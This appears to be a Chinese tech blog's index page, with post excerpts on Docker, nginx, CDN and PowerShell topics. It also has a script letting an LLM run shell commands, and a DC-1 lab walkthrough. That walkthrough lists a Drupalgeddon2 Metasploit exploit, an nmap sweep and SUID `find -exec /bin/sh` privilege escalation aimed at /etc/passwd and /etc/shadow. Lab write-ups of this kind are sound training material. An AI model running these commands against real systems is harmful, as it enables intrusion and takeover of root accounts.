zabbix7.0和代理proxy端的部署和配置详解(docker)
一般选择使用docker部署,简单不易出错, 安装zabbix服务端在文件夹下创建docker-compose.yaml,然后docker compose up -d(环境变量的数据库密码要一致) services: # 数据库,用mariadb或者mysql都行 mariadb-server: image: mariadb:10.11 container_name: mariadb-server command: - --character-set-server=utf8mb4 - --collation-server=utf8mb4_bin - --innodb_rollback_on_timeout=OFF - --innodb_lock_wait_timeout=30 volumes: - ./db_data:/var/lib/mysql environment: - MARIADB_USER=zabbix - MARIADB_PASSWO...
站点再次更新了404页面样式~
站点最近换 Dream2.0 Plus 主题了,但还是喜欢原来改的404动画,所以我手动修改了新主题的默认404模版代码,实现了和原来差不多的动画效果。 在横屏下使用css实现了动态的404动画,https://12520.net/404 参考了群内xjzsq大佬手搓的css代码:https://github.com/xjzsq/404-page 使用了js判断是否空间是否足够显示404动画,在 window.innerWidth >= 1440 时才展示,否则会使用图片替代。 横屏效果 竖屏效果 修改的主题代码:halo2/themes/theme-dream2-plus/templates/error/common/error_default.html 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666...
Portainer 反向代理后无法登录,显示 Unable to login
Portainer 从 2.27.7 版本开始,经过反向代理访问时无法登录,报错 “Unable to login” 。 Portainer 后端报错: portainer | 2025/09/16 07:34AM ERR github.com/portainer/portainer/api/http/csrf/csrf.go:100 > Failed to validate Origin or Referer | error="origin invalid" forwarded= host=xxx.xxxx.xxx origin=https://xxx.xxx.xxx referer=https://xxx.xxx.xxx/ request_url=/api/auth trusted_origins=["xxx.xxx.xxx"] x_forwarded_proto= 原因:2.27.7版本升级了 gorilla/csrf 这个第三方库,变得更严格地要求 Origin 和 Referer 头。 为了解决这个问题,Port...
右键菜单 在此处打开PowerShell窗口 无法进入指定目录
近期某人更新了 windows 自带的老旧 PowerShell5.1 到最新版本 7.5 后,发现 在右键菜单中的 “在此处打开 PowerShell 窗口” 选项工作不正常,打开的 PowerShell 无法进入指定目录 Set-Location : 找不到接受实际参数“19”的位置形式参数。 所在位置 行:1 字符: 1 + Set-Location -literalPath D:\桌面\TempFile\新建文件夹 (19) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (:) [Set-Location],ParameterBindingException + FullyQualifiedErrorId : PositionalParameterNotFound,Microsoft.PowerShell.Commands.SetLocationCommand PS C:\WINDOWS\system32> 这报错,一眼就...
接入腾讯EdgeOne CDN报告
2025/11/20编辑:宣布本文作废,现在Edgeone的海外节点在国内的范围体验还不如Cloudflare,现在换回cf了 听群友说腾讯的EdgeOne CDN国际版已经开始公测了,而且还有免费的国际节点套餐,钱包空空的站长也是立马去嫖了一个免费版兑换码,并接入本站。 本站EdgeOne CDN加速地址:https://www.12520.net/ 接入过程和其他cdn一样,动动手指就能接入 edgeone节点在国内访问的质量参差不齐,近期也有不少人开始对edgeone的ip节点进行优选,其中,edgeone貌似给了回源ip段,里面有不少ip是能直接使用的,也有不少ip报http代码418,具体需要自己携带host头发起http请求测试。(7月4日和7月6日使用itdog.cn的网站测速来对edgeone进行测试出现全红的情况,可能是edgeone有意屏蔽了来自itdog的测试节点ip) edgeone公开的回源ip段:https://api.edgeone.ai/ips 其中一个测试方法是使用curl指定域名解析ip测试 curl --resolve w...
Windows 下原生容器 docker(非虚拟化)安装部署
众所周知,windows下有两种容器实现方式 一种是基于虚拟化跑一个linux内核(Hyper-V WSL2),另一种是Windows原生容器(Windows container)。 本文讨论的是Windows原生容器,而不是基于虚拟化技术实现的容器。 要使用以及管理Windows container原生容器有两种方法,一种是直接使用Desktop Docker,另一种是直接使用Docker daemon + Docker CLI静态二进制可执行程序。(如果在服务器使用则建议第二种) 方法1:安装Desktop Docker可以直接去Desktop Docker官方下载 需要在安装过程的中 取消勾选 “Use WSL 2 instead of Hyper-V (recommended)” 选项 勾选 “Allow Windows Containers to be used with this installation” 选项 并在安装完成后右键任务栏右边的docker图标,选择“switch to windows containers”切换到windows容器模式。 设置完成后...
渗透DC-1靶机获取root权限和改root密码(简洁版)
在vmware workstation pro里面打开kali和DC-1靶机后(网络模式为nat) 先扫描同网段,拿到靶机ip nmap -sP 192.168.20.0/24 排除kali本机ip可直接拿到靶机的ip是192.168.20.137 直接上Metasploit,用Drupal Drupalgeddon 2 远程执行代码漏洞渗透进web msfconsole use exploit/unix/webapp/drupal_drupalgeddon2 set RHOSTS 192.168.20.137 exploit 进入到webshell shell 通过SUID提权(如果你是复制过去的,注意按回车执行) touch venus find / -type f -name venus -exec "whoami" \; find / -type f -name venus -exec "/bin/sh" \; 这时获得了读写/etc/passwd和/etc/shadow文件的权限,然后添加一...
Python调用大语言模型Function Calling接入命令行终端(deepseek为例)
最近突然心血来潮,想着让AI直接操作我的命令行,让他帮我完成一些简单的操作,比如让AI帮你安装docker,虽然很简单() 去查了相关资料,最终选择了AI模型的Function Calling,通过编写一个接入终端的tools实例,就能让AI直接在系统下运行powershell或者bash代码。 在运行前请安装依赖以及在代码中填入API key pip install openai 全部代码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115from openai import OpenAIimport jsonimport subprocessimport sy...
docker容器 nginx + acme.sh 实现自动续签证书
在docker中使用nginx,并在nginx容器中使用acme.sh自动续签证书,本文中使用CloudFlare的dns验证进行自动续签。 因为默认docker nginx镜像中没有cron,但acme的自动续签功能又依赖于cron,所以只能在此之上构建一个带cron的docker镜像。 编写dockerfilenano ./dockerfile 123456789# 以nginx镜像为基础镜像FROM nginx:latest# 更新软件包并安装 cron 和 curl(虽然nginx镜像已经包含curl了)RUN apt-get update && apt-get install -y cron curl && \ curl https://get.acme.sh | sh# 定义启动命令,启动cron和nginxCMD ["sh", "-c", "cron & nginx -g 'daemon off;'"] 构建镜像注意:过程需要连接到get....
Nginx日志显示访问者真实ip
在多层反代系统中,往往最底层的反代应用获取到的并非访问者的真实 ip ,而是上层反代应用的 ip 地址。 所以 Nginx 日志中默认输出的是上层反代应用的 ip ,这非常不利于统计分析 Nginx 日志。 想要让 Nginx 日志输出真实访问者的 ip ,需要有两个条件: 条件1:配置上层反代在请求头中传递真实访问者 ip ,以 Nginx 实例 server { listen 80; server_name domain.com; location / { …… proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; …… } } 条件2:配置底层 Nginx 反代从请求头中获取真实访问者 ip http { …… # 指定允许信任的上游代理(...